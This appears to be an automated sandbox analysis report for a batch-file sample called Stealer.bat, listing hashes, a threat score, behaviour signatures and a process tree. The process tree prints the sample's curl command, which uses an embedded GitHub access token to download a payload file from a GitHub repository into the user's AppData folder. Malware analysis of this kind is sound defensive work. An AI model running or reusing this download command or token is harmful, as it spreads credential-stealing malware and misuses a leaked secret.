Analysis
-
max time kernel
142s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
26/08/2023, 06:48
Static task
static1
Behavioral task
behavioral1
Sample
Stealer.bat
Resource
win7-20230712-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
Stealer.bat
Resource
win10v2004-20230703-en
2 signatures
150 seconds
General
-
Target
Stealer.bat
-
Size
552B
-
MD5
19e87500f65ad92c7fc92ad7310e6ff9
-
SHA1
44226cba9c85545a66d6a82c0cfd011894f579c1
-
SHA256
47d5295e390021e29ddeced6953bb69a7c81b7e1399c8cf52b071426273be8ce
-
SHA512
94ee394c5c9e66fae53060cfc5bfa327018c71cd546534f20475b7b5c25c9be38e19f332c043c7550726d0256525f7ae00449aaa148cb4359a23cc63abe7a831
Score
6/10
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3924 wrote to memory of 4456 3924 cmd.exe 83 PID 3924 wrote to memory of 4456 3924 cmd.exe 83
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Stealer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\system32\curl.execurl -s -H "Authorization: token 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" -o "C:\Users\Admin\AppData\Roaming\SStlrV2/Main.jsc" -L "https://raw.githubusercontent.com/SoraiaProjects/SStlrV2/main/Main.jsc"2⤵PID:4456
-